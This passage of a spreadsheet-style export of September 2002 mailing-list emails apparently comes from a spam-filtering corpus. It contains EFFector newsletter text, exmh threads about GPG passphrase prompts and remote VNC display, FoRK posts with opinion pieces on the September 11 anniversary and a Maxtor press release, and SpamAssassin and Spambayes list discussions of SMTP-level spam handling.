threats from\naround the Internet.\n\nCommunity Wireless Allows People to Break Away from Czech Telekom\nAnother wireless community helps bring access to rural areas and those\nwho otherwise would not have access. See the story at:\n[URL]http://www.pbj.cz[/URL]\n\n- end -\n\nGoogle Blocked in China\nA populat search engine is blocked in China and internet traffic is\nconstantly being monitored. Read about it at:\n[URL]http://news.bbc.co.uk[/URL]\n\n- end -\n\niPod Clone Spoiled by DRM\nSecond generation USB speed rendered useless by DRM encryption used in\nToshiba's Mobilphile:\n[URL]http://www.zdnet.com[/URL],4161,2877898,00.html\n\n- end -\n\nThe Netizen in 2002\nWhat does it mean to be a Netizen today? Contribute to the call for\nsubmissions found at:\n[URL]http://www.well.com[/URL]\n\n- end -\n\n\n*Administrivia\n\nEFFector is published by:\n\nThe Electronic Frontier Foundation\n454 Shotwell Street\nSan Francisco CA 94110-1914 USA\n+1 415 436 9333 (voice)\n+1 415 436 9993 (fax)\n  [URL]http://www.eff.org[/URL]\n\nEditor:\nRen Bucholz, Activist\n  ren@eff.org\n\nTo Join EFF online, or make an additional donation, go to:\n  [URL]http://www.eff.org[/URL]\n\nMembership &amp; donation queries: membership@eff.org\nGeneral EFF, legal, policy or online resources queries: ask@eff.org\n\nReproduction of this publication in electronic media is encouraged.\nSigned articles do not necessarily represent the views of EFF. To\nreproduce signed articles individually, please contact the authors for\ntheir express permission. Press releases and EFF announcements &amp;\narticles may be reproduced individually at will.\n\nTo change your address, please visit [URL]http://action.eff.org[/URL]\n&gt;&gt;From there, you can update all your information. If you have already\nsubscribed to the EFF Action Center, please visit\n[URL]http://action.eff.org[/URL]\n\nTo unsubscribe from the EFFector mailing list, send an email to\nalerts@action.eff.org with the word "Remove" in the subject.\n\n(Please ask ren@eff.org to manually remove you from the list if this\ndoes not work for you for some reason.)\n\nBack issues are available at:\n  [URL]http://www.eff.org[/URL]\n\nTo get the latest issue, go to:\n  [URL]http://www.eff.org[/URL]\n\n\n++++++++++++++++++++++++\nYou received this message because qqqqqqqqqqs-eff@example.com is a member of\nthe mailing list originating from alerts@action.eff.org. To unsubscribe \nfrom all mailing lists originating from alerts@action.eff.org, send an \nemail from qqqqqqqqqqs-eff@example.com to alerts@action.eff.org with 'Remove' as the\nonly text in the subject line.</t>
  </si>
  <si>
    <t>http://www.eff.org http://www.eff.org http://www.eff.org http://www.eff.org http://www.janisian.com http://www.eff.org http://www.eff.org http://www.eff.org http://www.pbj.cz http://news.bbc.co.uk http://www.zdnet.com http://www.well.com http://www.eff.org http://www.eff.org http://action.eff.org http://action.eff.org http://www.eff.org http://www.eff.org</t>
  </si>
  <si>
    <t>To: nan\nFrom: Kevin Cosgrove &lt;kevinc@dOink.COM&gt;\nDate: Wed, 11 Sep 2002 12:53:10 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 12:53:10 -0700</t>
  </si>
  <si>
    <t>Gotta wonder what the GPG config stuff in ~/.exmh/exmh-defaults looks  like.  Also gotta wonder what the message headers in the offending  message are saying to nmh/exmh.  My set-up works perfectly.  That is,  I get a pop-up window to enter my passphrase into, and when I type it  correctly, the message display changes from a prompt to click to  decrypt to the message content. TTFN.... On 11 September 2002 at 12:17, Brent Welch  wrote: Hmm - I'm cc'ing the exmh-workers list, because I really don't know much about the various PGP interfaces.  I think there has been some talk about "issues" with the latest version of gpg. &gt;&gt;&gt;Hacksaw said:  &gt; version 2.5 08/15/2002  &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31  &gt; EDT 2001 i686 unknown  &gt; Tk 8.3 Tcl 8.3  &gt;   &gt; It's not clear to me this is a bug with exmh per se, but it's  &gt; something that manifests through exmh, so I figured asking you  &gt; might help me track it down.  &gt;  &gt; When I receive a gpg encrypted message, and it asks me for a  &gt; passphrase, it first tries to ask me via the tty under which  &gt; exmh is running. It tells me my passphrase is incorrect every  &gt; time, at which point exmh offers me the line in the message  &gt; about decrypting. I click the line and it offers me the dialog  &gt; box, and tells me the passphrase is correct, and shows me the  &gt; decrypted message.  &gt;   &gt; Any ideas on that?  &gt; --   &gt; Honour necessity.  &gt; [URL]http://www.hacksaw.org[/URL] -- [URL]http://www.privatecircus.com[/URL] -- KB1FVD _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.hacksaw.org http://www.privatecircus.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 11 Sep 2002 12:47:58 -0400</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 12:47:58 -0400</t>
  </si>
  <si>
    <t>A Living Memorial</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Say 'amen' somebody. What the WSJ said, appended below. The WTC, as constructed, was a confiscatory government boondoggle, expropriated from the original pre-construction property owners at the behest of a third-generation trust-fund-aristocrat for the "good" of the city, and owned by an "authority" looking for something else to do after it, and its coach-hounds in organized labor and organized crime, had killed what was the largest port in the world's richest nation. Now, of course, it's about to get worse. The sins of 40 years ago have been compounded at the hands of two kinds of literally irrational fanatics, first those in religion, and now those in government. As a result, a large part of 10 million square feet of once perfectly usable office space, devoted, at least ostensibly, to commerce, will be "granted" away  in a potlatch that only government, and special-interest "communities", (or "stakeholders", or whatever the cryptosocialist psycho-rabble call themselves this week) can organize to such perfection. All this in probably the *only* city in the country that was founded by a *business*, explicitly for the purpose of *commerce*. Not religious fanaticism. Not colonial expansion in a monarch's name. *Commerce*. If they *really* wanted to make a point to the superstitious luddites who collapsed those buildings (using probably the only sharp objects on a plane full of government-disarmed passengers) the so-called "authority" should disband itself and sell its property off to the highest bidder and let the *market* -- the cure to all luddism, foreign and domestic, government and superstitious -- decide. If the new, *private* owner wants to sell, or give away, a space for a memorial, fine. They could sell tickets and donate the money to the families of the dead and injured. Probably great for marketing the property, at least during the lifetime of anyone who remembers the event. And, of course, if the new owner wants to build something twice as tall, or with twice as much space than the original 10 million square feet, splendid. Whatever the market will bear. In these days of increasingly ubiquitous trans-national geodesic internetworks, of strong financial cryptography, and of exponentially decreasing transaction costs in formerly monolithic industries, economics and freedom can, and will, prevail over both superstition and statism. It's probably too much to hope for an actual market in lower Manhattan mega-real-estate to prevail this early in the game, but it's going to happen sooner or later. And, whenever it does, *that* will be a fitting memorial to those who died at the World Trade Center. Cheers, RAH - ------- [URL]http://online.wsj.com[/URL],,SB1031705210159756235,00.html The Wall Street Journal September 11, 2002 REVIEW &amp; OUTLOOK A Living Memorial As we write these words, we can look down from our offices into the six-story crater where the Twin Towers once stood. Like everyone else, we want that site to be rebuilt in a way that honors those who died a year ago. But we also think the best memorial to those who perished would be a living one. The site of the World Trade Center calls forth many emotions, especially today: anger, grief and respect for the many acts of heroism that took place there. But underlying it all is the memory of the enormous vitality that distinguished the towers before they were attacked and was a large reason they were targeted. The best expression of the spirit of New York and of those who died would be to once again see thousands of people from dozens of countries working, meeting, shopping, eating -- that is, engaged in the sort of productive work and play that used to take place there. Osama bin Laden should not be allowed to have turned it into a cemetery. But restoring this memory is not what the discussion in New York has been about. So far no one is talking seriously about the vigorous rebuilding of downtown Manhattan, which lost 100,000 jobs when the Trade Center fell. Instead the discussion centers on the size and scale of the memorial, and on satisfying every political interest now clamoring for a piece of the action. New York's political leadership, and its financial and media elites, are squandering a historic chance to rebuild a better, more prosperous city. This is in part the fault of the commission tasked with figuring out what to do with the site. In consultation with New York Governor George Pataki, who is thinking primarily about his own November re-election, the commission made the decision to focus first on the memorial. The Manhattan Institute's Steve Malanga argues that the commission would have been better off setting aside a limited space for the memorial, getting on with the rebuilding and then returning to the memorial. This is in essence what the Pentagon has so successfully done -- rebuild immediately and set aside two acres for an outdoor memorial, a design for which has yet to be decided. A big part of the problem in New York is that the city's anti-development activists know an opening when they see one. They want the World Trade Center site -- and even some surrounding areas - -- transformed into an enormous park. These political advocates have had plenty of practice at turning proposed development projects in New York into a nightmare of delay and litigation, and the World Trade Center site is now getting the same treatment. Worse, they are cynically using some bereaved family members to advance their own anti-development agenda in the name of "honoring" the dead. One family group even called a press conference to reject as disrespectful a proposed train line under the site. We are not experts in designing war memorials, but we're confident that a gigantic park in the heart of the world's financial center isn't the appropriate choice for those who died a year ago. The great cities of Europe and Japan, devastated in World War II, have all rebuilt, and with memorials that are integrated into modern urban life. Perhaps the most powerful is found in Rotterdam, the Dutch port city reduced to rubble by German bombing, where survivors erected a statue of a man with a hole where his heart used to be. In this country, the practice has been for the names of war dead to be inscribed on the walls of institutions with which they were affiliated. If you walk into Nassau Hall at Princeton University, you'll find the names of 644 alumni who died in the Revolutionary War, the War of 1812, the Civil War, the Spanish-American War, World War I, World War II, Korea and Southeast Asia. No one thinks it disrespectful to the dead that the life of the university goes on around the walls containing their names. In New York now, it would help if political leaders looked beyond the emotional tug of the victims and their families to the city's future. Rudolph Giuliani, now that he's out office, wants the entire 16 acres devoted to the memorial. Governor Pataki has called for no structures on the "footprints," which, being in the center of the site, would severely curtail options. Mayor Michael Bloomberg initially raised his voice in favor of commercial development but was bloodied by the press and has since ducked for cover. Maybe things will be different after this anniversary is past. Maybe those responsible for the World Trade Center site will start thinking more about the next 50 or 100 years than the past 12 months. The best way to honor the dead is by reviving normal life and commerce. -----BEGIN PGP SIGNATURE----- Version: PGP 7.5 iQA/AwUBPX9zD8PxH8jf3ohaEQI2aACgv7mtb5VKTpRj5MJQt1OyzyifzusAn273 fgNkOntna6+SmLO8TB4XYbC2 =09az -----END PGP SIGNATURE-----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online.wsj.com</t>
  </si>
  <si>
    <t>To: "Fork@Xent.Com" &lt;fork@spamassassin.taint.org&gt;\nFrom: "Bill Stoddard" &lt;bill@wstoddard.com&gt;\nDate: Wed, 11 Sep 2002 12:37:15 -0400</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 12:37:15 -0400</t>
  </si>
  <si>
    <t>"Bill Stoddard" &lt;bill@wstoddard.com&gt;</t>
  </si>
  <si>
    <t>"Fork@Xent.Com" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Hanson's Sept 11 message in the National Review</t>
  </si>
  <si>
    <t>[URL]http://www.nationalreview.com[/URL]\n\n\nSeptember 11, 2002 8:00 a.m.\nThe Wages of September 11\nThere is no going back.\n\n\n\nSeptember 11 changed our world. Those who deny such a watershed event take a\nsuperficially short-term view, and seem to think all is as before simply\nbecause the sun still rises and sets.\n\nThis is a colossal misjudgment. The collapse of the towers, the crashing\ninto the Pentagon, and the murder of 3,000 Americans  all seen live in real\ntime by millions the world over  tore off a scab and exposed deep wounds,\nwhich, if and when they heal, will leave ugly scars for decades. The killers\ndealt in icons  the choice of 911 as the date of death, targeting the\nmanifest symbols of global capitalism and American military power, and\ncentering their destruction on the largest Jewish city in the world. Yes,\nthey got their symbols in spades, but they have no idea that their killing\nhas instead become emblematic of changes that they could scarcely imagine.\n\nIslamic fundamentalism has proved not ascendant, but static, morally\nrepugnant  and the worst plague upon the Arab world since the Crusades. By\nlurking in the shadows and killing incrementally through stealth, the\nvampirish terrorists garnered bribes and subsidies through threats and\nbombs; but pale and wrinkled in the daylight after 9/11, they prove only\nghoulish not fearsome.\n\nThe more the world knows of al Qaeda and bin Laden, the more it has found\nthem both vile and yet banal  and so is confident and eager to eradicate\nthem and all they stand for. It is one thing to kill innocents, quite\nanother to take on the armed might of an aroused United States. Easily\ndodging a solo cruise missile in the vastness of Afghanistan may make good\ntheater and bring about braggadocio; dealing with grim American and British\ncommandos who have come 7,000 miles for your head prompts abject flight and\nan occasional cheap infomercial on the run. And the ultimate consequence of\nthe attacks of September 11 will not merely be the destruction of al Qaeda,\nbut also the complete repudiation of the Taliban, the Iranian mullocracy,\nthe plague of the Pakistani madrassas, and any other would-be fundamentalist\nparadise on earth.\n\nForeign relations will not be the same in our generation. Our coalition with\nEurope, we learn, was not a partnership, but more mere alphabetic\nnomenclature and the mutual back scratching of Euro-American globetrotters \na paper alliance without a mission nearly 15 years after the end of the Cold\nWar. The truth is that Europe, out of noble purposes, for a decade has\ninsidiously eroded its collective national sovereignty in order to craft an\nantidemocratic EU, a 80,000-person fuzzy bureaucracy whose executive power\nis as militarily weak as it is morally ambiguous in its reliance on often\ndubious international accords. This sad realization September 11 brutally\nexposed, and we all should cry for the beloved continent that has for the\nmoment completely lost its moral bearings. Indeed, as the months progressed\nthe problems inherent in "the European way" became all too apparent:\npretentious utopian manifestos in lieu of military resoluteness, abstract\nmoralizing to excuse dereliction of concrete ethical responsibility, and\nconstant American ankle-biting even as Europe lives in a make-believe Shire\nwhile we keep back the forces of Mordor from its picturesque borders, with\nonly a few brave Frodos and Bilbos tagging along. Nothing has proved more\nsobering to Americans than the skepticism of these blinkered European\nhobbits after September 11.\n\nAmerica learned that "moderate" Arab countries are as dangerous as hostile\nIslamic nations. After September 11, being a Saudi, Egyptian, or Kuwaiti\nmeans nothing special to an American  at least not proof of being any more\nfriendly or hostile than having Libyan, Syrian, or Lebanese citizenship.\nIndeed, our entire postwar policy of propping up autocracies on the triad of\ntheir anticommunism, oil, and arms purchases  like NATO  belongs to a\npre-9/11 age of Soviet aggrandizement and petroleum monopolies. Now we learn\nthat broadcasting state-sponsored hatred of Israel and the United States is\njust as deadly to our interests as scud missiles  and as likely to come\nfrom friends as enemies. Worst-case scenarios like Iran and Afghanistan\noffer more long-term hope than "stable regimes" like the Saudis; governments\nthat hate us have populations that like us  and vice versa; the Saudi royal\nfamily, whom 5,000 American troops protect, and the Mubarak autocracy, which\nhas snagged billions of American dollars, are as afraid of democratic\nreformers as they are Islamic fundamentalists. And with good reason: Islamic\ngovernments in Iran and under the Taliban were as hated by the masses as\nArab secular reformers in exile in the West are praised and championed.\n\nThe post-9/11 domestic calculus is just as confusing. Generals and the\nmilitary brass call civilians who seek the liberation of Iraq "chicken\nhawks" and worse. Yet such traditional Vietnam-era invective I think rings\nhollow after September 11, and sounds more like McClellan's shrillness\nagainst his civilian overseers who precipitously wanted an odious slavery\nended than resonant of Patton's audacity in charging after murderous Nazis.\nMore Americans were destroyed at work in a single day than all those\nsoldiers killed in enemy action since the evacuation of Vietnam nearly 30\nyears ago. Indeed, most troops who went through the ghastly inferno of\nVietnam are now in or nearing retirement; and, thank God, there is no\ngeneration of Americans in the present military  other than a few thousand\nbrave veterans of the Gulf, Mogadishu, and Panama  who have been in\nsustained and deadly shooting with heavy casualties. Because American\nsoldiers and their equipment are as impressive as our own domestic security\nis lax, in this gruesome war it may well be more perilous to work high up in\nlower Manhattan, fly regularly on a jumbo jet, or handle mail at the\nPentagon or CIA than be at sea on a sub or destroyer.\n\nReal concern for the sanctity of life may hinge on employing rather than\nrejecting force, inasmuch as our troops are as deadly and protected abroad\nas our women, children, aged, and civilians are impotent and vulnerable at\nhome. It seems to me a more moral gamble to send hundreds of pilots into\nharm's way than allow a madman to further his plots to blow up or infect\nthousands in high-rises.\n\nPolitics have been turned upside down. In the old days, cynical\nconservatives were forced to hold their noses and to practice a sometimes\nrepellent Realpolitik. In the age of Russian expansionism, they were loathe\nto champion democracy when it might usher in a socialist Trojan Horse whose\nbelly harbored totalitarians disguised as parliamentarians. Thus they were\nso often at loggerheads with nave and idealist leftists.\n\nNo longer. The end of the specter of a deadly and aggressive Soviet\nCommunism has revived democratic ideology as a force in diplomacy. Champions\nof freedom no longer sigh and back opportunistic rightist thugs who promise\nopen economics, loot their treasuries, and keep out the Russians. Instead,\neven reactionaries are now more likely to push for democratic governments in\nthe Middle East than are dour and skeptical leftists. The latter, if\nmulticulturalists, often believe that democracy is a value-neutral Western\nconstruct, not necessarily a universal good; if pacifists, they claim\nnonintervention, not justice, as their first priority. The Right, not the\nLeft, now is the greater proponent of global freedom, liberation, and\nidealism  with obvious domestic ramifications for any Republican president\nastute enough to tap that rich vein of popular support.\n\nAll this and more are the wages of the disaster of September 11 and the\nsubsequent terrible year  and yet it is likely that, for good or evil, we\nwill see things even more incredible in the twelve months ahead.</t>
  </si>
  <si>
    <t>http://www.nationalreview.com</t>
  </si>
  <si>
    <t>To: Hacksaw &lt;hacksaw@hacksaw.org&gt;\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Wed, 11 Sep 2002 12:17:33 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 12:17:33 -0700</t>
  </si>
  <si>
    <t>Hmm - I'm cc'ing the exmh-workers list, because I really don't know\nmuch about the various PGP interfaces.  I think there has been some\ntalk about "issues" with the latest version of gpg.\n\n&gt;&gt;&gt;Hacksaw said:\n &gt; version 2.5 08/15/2002\n &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 \n17:09:31\n &gt; EDT 2001 i686 unknown\n &gt; Tk 8.3 Tcl 8.3\n &gt; \n &gt; It's not clear to me this is a bug with exmh per se, but it's something \nthat\n      \n &gt; manifests through exmh, so I figured asking you might help me track it \ndown.\n &gt; \n &gt; When I receive a gpg encrypted message, and it asks me for a passphrase, \nit\n &gt; first tries to ask me via the tty under which exmh is running. It tells \nme m\n     y \n &gt; passphrase is incorrect every time, at which point exmh offers me the \nline i\n     n \n &gt; the message about decrypting. I click the line and it offers me the \ndialog\n &gt; box, and tells me the passphrase is correct, and shows me the decrypted \n &gt; message.\n &gt; \n &gt; Any ideas on that?\n &gt; -- \n &gt; Honour necessity.\n &gt; [URL]http://www.hacksaw.org[/URL] -- [URL]http://www.privatecircus.com[/URL] -- KB1FVD\n\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.hacksaw.org http://www.privatecircus.com www.panasas.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: Adam Rifkin &lt;adam@KnowNow.com&gt;, FoRK@xent.com\nFrom: Udhay Shankar N &lt;udhay@pobox.com&gt;\nDate: Wed, 11 Sep 2002 11:45:45 +0530</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 11:45:45 +0530</t>
  </si>
  <si>
    <t>Adam Rifkin &lt;adam@KnowNow.com&gt;, FoRK@xent.com</t>
  </si>
  <si>
    <t>storage bits</t>
  </si>
  <si>
    <t>At 12:32 PM 12/28/00 -0600, Adam Rifkin wrote:\n\n&gt;I repeat, IBM 76.8Gb ultra dma/100 hard drive at Fry's for $375...\n&gt;"home of fast, friendly courteous service! (R)"\n&gt;\n&gt;I kid you not.  That's a half a cent a Megabyte for storage.\n&gt;Not El Cheapo storage but top of the line storage.\n\nless than two years later, we have 320 GB for the same price:\n\n[URL]http://www.shareholder.com[/URL]\n\nMaxtor Driving Capacity-Centric Enterprise Apps With "Super-Sized" ATA Drives\n\nMaxtor Continues its Leadership in the Market it Pioneered with a New \nCategory of High-Density ATA Drives\n\nMILPITAS, Calif., September 9, 2002-\n\nMaxtor Corporation (NYSE: MXO), a worldwide leader in hard disk drives and \ndata storage solutions, today announced Maxtor MaXLineTM, its newest \ngeneration of ATA drives designed specifically for rapidly emerging \nenterprise storage applications including near-line, media storage and \nnetwork storage. The MaXLine family features two critical differentiators: \nhuge capacities up to 320 GB for corporate archiving and media recording; \nand unique manufacturing and quality for 24/7 operations with mean time to \nfailure (MTTF) rates exceeding one million hours.\n\nThe MaXLine family is designed to bring hard disk drives into "near-line" \narchive applications. By adding a layer of MaXLine drives to archive \narchitectures, companies can instantly recover time-critical data including \nexecutive e-mail, transaction data and accounting data that may need to be \nrecovered on demand.\n\nThese new drives are designed to solve another enterprise problem with the \nstorage of video, media and audio conference call files. Even compressed, \nthese files take up tremendous amounts of high-cost server space. Priced \nstarting around $299.95 to $399.95 MSRP, Maxtor's MaXLine family offers \nhigh capacity drives for enterprise applications at price points between \ntraditional ATA and SCSI drives.\n\nFor system OEMs and white box builders, MaXLine offers high-density, \neasy-to-integrate storage for use in entry-level and mid-size server \nenvironments.\n\n"The demand for instant recall of archived data is expanding as companies \nare meeting their obligations to quickly access executive e-mails, \nfinancial documents and transaction records," said Mike Dooley, senior \ndirector of marketing for the Desktop Products Group at Maxtor. "Users may \nnot need to access information in these applications on a daily basis, but \nwhen they do need access, it must be instant. Recent advances in ATA \ntechnology and our manufacturing processes allow us to build upon our \nlegacy of experience and provide our customers with a family of premium ATA \nhard drives that can be integrated into a variety of systems for these \nenterprise applications."\n\nThe MaXLine family includes the 5400-RPM MaXLine II, designed for \ncapacities up to 320 GB and the 7200-RPM MaXLine Plus II, designed for \ncapacities up to 250 GB. At these capacities, MaXLine offers higher storage \ndensity than many tape and optical solutions. These drives have also been \ntested and are projected to meet enterprise reliability requirements, \nalready exceeded by prior drives employing the same robust Maxtor designs, \nwhich exceed MTTF of over one million hours. These drives will also carry a \nthree-year warranty.\n\nThe MaXLine II and MaXLine Plus II feature the Maxtor Fast DriveTM \nUltraATA/133 interface for data transfer speeds up to 133 MB per second. \nThe MaXLine II and MaXLine Plus II will be available with next-generation \nserial ATA interface for higher performance. At 150 MB per second maximum \ndata transfer rate, serial ATA improves hard drive performance to keep pace \nwith the rapidly increasing performance requirements of data intensive \nenvironments and enterprise applications.\n\nWith a point-to-point connection architecture, and rich command set for \nmanaging hard drive activity and data flow along the interface, serial ATA \nadvances the performance and efficiency of the drive to system interface. \nThe interface's reduced pin count allows for simpler cabling which in turn \nallows better airflow within a system and further benefits the user with \nincreased design flexibility and hot plug capability.\n\n"Maxtor's MaXLine family of drives provide a solution for storing data that \nhas previously been too expensive to keep on disk," said Dave Reinsel, \nanalyst at IDC. "The ATA drives offer a great value, low cost per GB and \nwhen integrated into storage systems and file servers offer a compelling \ncost-effective alternative to tape libraries and optical drives, which have \nbeen the traditional solutions used for near-line applications."\n\nAvailability\nLimited qualification units of the parallel ATA versions of Maxtor MaXLine \nII and MaXLine Plus II are now available; with volume units available in \nthe fourth quarter. Qualification units of the MaXLine II and MaXLine Plus \nII with serial ATA will be available later this month with volume shipments \nscheduled to begin in the first quarter of 2003.\n\nAbout Maxtor\nMaxtor Corporation ([URL]www.maxtor.com[/URL] is one of the world's leading suppliers \nof information storage solutions. The company has an expansive line of \nstorage products for desktop computers, storage systems, high-performance \nservers and consumer electronics. Maxtor has a reputation as a proven \nmarket leader built by consistently providing high-quality products and \nservice and support for its customers. Maxtor and its products can be found \nat [URL]www.maxtor.com[/URL] or by calling toll-free (800) 2-MAXTOR. Maxtor is traded \non the NYSE under the MXO symbol.\n\nNote: Maxtor, MaXLine and the Maxtor logo are registered trademarks of \nMaxtor Corporation. Fast Drive is a trademark of Maxtor Corporation. All \nother trademarks are properties of their respective owners.\n\nGB means 1 billion bytes. Total accessible capacity varies depending on \noperating environment.\n\nThis announcement relating to Maxtor may contain forward-looking statements \nconcerning future technology, products incorporating that technology, and \nMaxtor's execution. These statements are based on current expectations and \nare subject to risks and uncertainties which could materially affect the \ncompany's results, including, but not limited to, market demand for hard \ndisk drives, the company's ability to execute future production ramps and \nutilize manufacturing assets efficiently, pricing, competition, and the \nsignificant uncertainty of market acceptance of new products.  These and \nother risk factors are contained in documents that the company files with \nthe SEC, including the Form 10-K for fiscal 2001 and its recent 10-Qs.\n\nCopyright  2001, Maxtor Corporation . Privacy Policy.\n\n\n\n-- \n((Udhay Shankar N)) ((udhay @ pobox.com)) (([URL]www.digeratus.com[/URL]</t>
  </si>
  <si>
    <t>http://www.shareholder.com www.maxtor.com www.maxtor.com www.digeratus.com</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Wed, 11 Sep 2002 11:25:50 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 11:25:50 -0700</t>
  </si>
  <si>
    <t>"FoRK" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: Hanson's Sept 11 message in the National Review</t>
  </si>
  <si>
    <t>Hanson is always good.\n\nOne of my sci-fi authors is planning on slipping the following line into\none of their stories:\n\n"The worst strategic mistake since the 911 attacks".\n\n\n\n&gt; -----Original Message-----\n&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nBill\n&gt; Stoddard\n&gt; Sent: Wednesday, September 11, 2002 9:37 AM\n&gt; To: Fork@Xent.Com\n&gt; Subject: Hanson's Sept 11 message in the National Review\n&gt; \n&gt; \n&gt; [URL]http://www.nationalreview.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Crist J. Clark" &lt;crist.clark@attbi.com&gt;\nDate: Wed, 11 Sep 2002 10:36:18 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 10:36:18 -0700</t>
  </si>
  <si>
    <t>"Crist J. Clark" &lt;crist.clark@attbi.com&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Reject, Blackhole, or Fake No-User?</t>
  </si>
  <si>
    <t>This is not directly SpamAssassin related, but more of a general\ndealing-with-SPAM issue.\n\nWhat is the best way to deal with SPAM during the SMTP transaction?\nThere are domains and addresses that I know are SPAM at the 'MAIL\nFROM' and can deal with at the SMTP level. I have been, and I think\nmost people, respond with a 5.7.1 code, a "permanent" error. That\npretty much means, "Don't bother to try from that address again,\nyou'll get the same error." People often add cathartic messages to\naccompany the 550 like, "Spammers must die."\n\nBut this might not be the best way to go. You are telling the spammers\nthat you are on to them. This may cause them to try other methods to\nget around your blocks. Is it perhaps better to blackhole the mail?\nThat is, act like everything is OK during the SMTP transaction, but\nthen just drop the mail into the bitbucket. (This is generally how\nSpamAssassin works since almost everyone uses it after the SMTP\ntransaction has completed successfully.) Spammer thinks everything is\ngoing fine and has no reason to try new methods.\n\nThen there is a third possibility. Instead of returning a 550 code\nindicating you're on to the spammer, fake a 5.1.1 response which is\nsaying "mailbox does not exist." This would be in the hopes that some\nspammers out there actually remove names reported as non-existent from\ntheir lists. I know, a slim hope, but even if only a few do, it can\nlower the incidence.\n\nSo, what are the arguments for each? Do spammers even look at _any_ of\nthe bounce messages they get? The volume of bounces must be\nhuge. Personally, I'm starting to think blackholes are the way to\ngo... But sending back that "Spammer die, die, die," or stock "Access\nDEE-NIED!" (my ephasis added) message can be pretty satisfying. ;)\n-- \nCrist J. Clark                     |     cjclark@alum.mit.edu\n                                   |     cjclark@jhu.edu\n[URL]http://people.freebsd.org[/URL]    |     cjc@freebsd.org\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://people.freebsd.org www.osdn.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Vivek Khera &lt;khera@kcilink.com&gt;\nDate: Wed, 11 Sep 2002 09:36:38 -0400</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 09:36:38 -0400</t>
  </si>
  <si>
    <t>Vivek Khera &lt;khera@kcilink.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] base64 decode problem?</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "CW" == Carlo Wood  writes: CW&gt; to manually decode the base64 part. CW&gt; Can someone please tell me how to do that? google: base64 decode the first three results look useful. ------------------------------------------------------- In remembrance [URL]www.osdn.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Wed, 11 Sep 2002 08:27:24 -0500</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 08:27:24 -0500</t>
  </si>
  <si>
    <t>Re: Sorting</t>
  </si>
  <si>
    <t>&gt;&gt; I run exmh on my desktops at home and at work with the resulting exmh\n&gt;&gt; windows being displayed on both my work and home desktops (gratis SSH\n&gt;&gt; X11 forwarding).  In fact, your message was read and replied to (this\n&gt;&gt; message) while at work, using an exmh instance running on my home\n&gt;&gt; machine.\n\nJust to throw in another approach to solving the same problem. \n\nI run two copies of exmh, one at work, one at home.  They both\ndisplay on a "virtual X server" created by vncserver on the home\nbox.  I connect to that virtual X server using vncviewer wherever\nI happen to be.  The VNC connection is tunneled over ssh and is\ncarried over the Internet via an IPSEC appliance.\n\nThat gives me access to both home and work email from either \nplace without the complications involved in having two copies of \nexmh working on the same set of folders.\n\nIt's a tad slow viewing work email when I'm at work ... but not \nso bad that I can't stand it.\n\n--Hal\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: gward@python.net (Greg Ward)\nDate: Wed, 11 Sep 2002 08:23:08 -0400</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 08:23:08 -0400</t>
  </si>
  <si>
    <t>gward@python.net (Greg Ward)</t>
  </si>
  <si>
    <t>[Spambayes] XTreme Training</t>
  </si>
  <si>
    <t>On 10 September 2002, Tim Peters said: &gt; Why would spam be likely to end up with two instances of Return-Path &gt; in the headers? Possibly another qmail-ism from Bruce Guenter's spam collection.  Or maybe Anthony's right about spammers being stupid and blindly copying headers.  (Well, of course he's right about spammers being stupid; it's just this particular aspect of stupidity that's open to question.)         Greg --  Greg Ward                          [URL]http://www.gerg.ca[/URL] Think honk if you're a telepath.</t>
  </si>
